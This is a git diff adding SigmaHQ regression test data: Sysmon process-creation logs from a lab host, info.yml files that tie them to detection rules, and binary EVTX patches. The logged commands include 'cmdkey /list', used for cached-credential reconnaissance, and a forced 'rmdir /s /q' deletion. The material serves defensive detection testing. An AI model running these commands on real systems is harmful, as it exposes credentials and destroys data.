"FileVersion": "10.0.20348.3932 (WinBuild.160101.0800)", + "Description": "Windows Command Processor", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "Cmd.Exe", + "CommandLine": "cmd /c \"rmdir /s /q malware_folder\"", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=BC2820B5EE7B43C172005B66546F12316DE8C081,MD5=8903A3381FBB033A45F5C2C50C175C54,SHA256=F7C237A49B96FD77C047910E13F24AAC4678A0F94BABDB06643DBA63F38D48E5,IMPHASH=D60B77062898DC6BFAE7FE11A0F8806C", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_cmd_rmdir_execution/info.yml b/regression_data/windows/process_creation/proc_creation_win_cmd_rmdir_execution/info.yml new file mode 100644 index 000000000..b700d79bf --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_cmd_rmdir_execution/info.yml @@ -0,0 +1,13 @@ +id: 20a05730-38e8-4889-ab29-0723f185deb0 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 41ca393d-538c-408a-ac27-cf1e038be80c + title: Directory Removal Via Rmdir +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_cmd_rmdir_execution/41ca393d-538c-408a-ac27-cf1e038be80c.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds/b1ec66c6-f4d1-4b5c-96dd-af28ccae7727.evtx b/regression_data/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds/b1ec66c6-f4d1-4b5c-96dd-af28ccae7727.evtx new file mode 100644 index 0000000000000000000000000000000000000000..1269de85a3f75489931406350f68776bde778db1 GIT binary patch literal 69632 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 D0aOxc literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_cmdkey_recon/07f8bdc2-c9b3-472a-9817-5a670b872f53.json b/regression_data/windows/process_creation/proc_creation_win_cmdkey_recon/07f8bdc2-c9b3-472a-9817-5a670b872f53.json new file mode 100644 index 000000000..50408f0db --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_cmdkey_recon/07f8bdc2-c9b3-472a-9817-5a670b872f53.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:21:33.116889Z" + } + }, + "EventRecordID": 8581967, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:21:33.111", + "ProcessGuid": "5AA13A44-CEDD-68FC-1B30-000000004002", + "ProcessId": 7876, + "Image": "C:\\Windows\\System32\\cmdkey.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Credential Manager Command Line Utility", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "cmdkey.exe", + "CommandLine": "cmdkey /list", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=138CCC1346F17921DC1DF71C88F472ACCC24BC5F,MD5=8B20EBCF5A2C5410B43765B5CEA17E5B,SHA256=F71C08CB7630990EE46338937897C0A83C96DFB8F37DB70322CE7417C01157AA,IMPHASH=03AD7A1AF78BF7A500FB199CABE4C34A", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_cmdkey_recon/info.yml b/regression_data/windows/process_creation/proc_creation_win_cmdkey_recon/info.yml new file mode 100644 index 000000000..041649eee --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_cmdkey_recon/info.yml @@ -0,0 +1,13 @@ +id: aa97fab6-a83e-4e4f-ad0b-f0cc2a43c24e +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 07f8bdc2-c9b3-472a-9817-5a670b872f53 + title: Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_cmdkey_recon/07f8bdc2-c9b3-472a-9817-5a670b872f53.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_conhost_headless_powershell/056c7317-9a09-4bd4-9067-d051312752ea.evtx b/regression_data/windows/process_creation/proc_creation_win_conhost_headless_powershell/056c7317-9a09-4bd4-9067-d051312752ea.evtx new file mode 100644 index 0000000000000000000000000000000000000000..2bda8a11e3e14dde13dd2ff282183c48d8f29d81 GIT binary patch literal 69632 zcmeHQ3v^V~x!yBLCNGi@1Vt1Xe4qjec|SlTlSu|r62t^VEiDa6Adx&U2?C{RmWsC3 zBG%qst@mNA>$bLQ*;d6x)xPy!mdlFuwo19^MQN{ncptTRZ!M&Azi*$tnKLtICKJrW zu(HprGiRT(_x|_4|NZZO|Nnm0cW(-Gb$5u!%dI{P;prABLQHi<2KmtMz7I}Z`JsUr 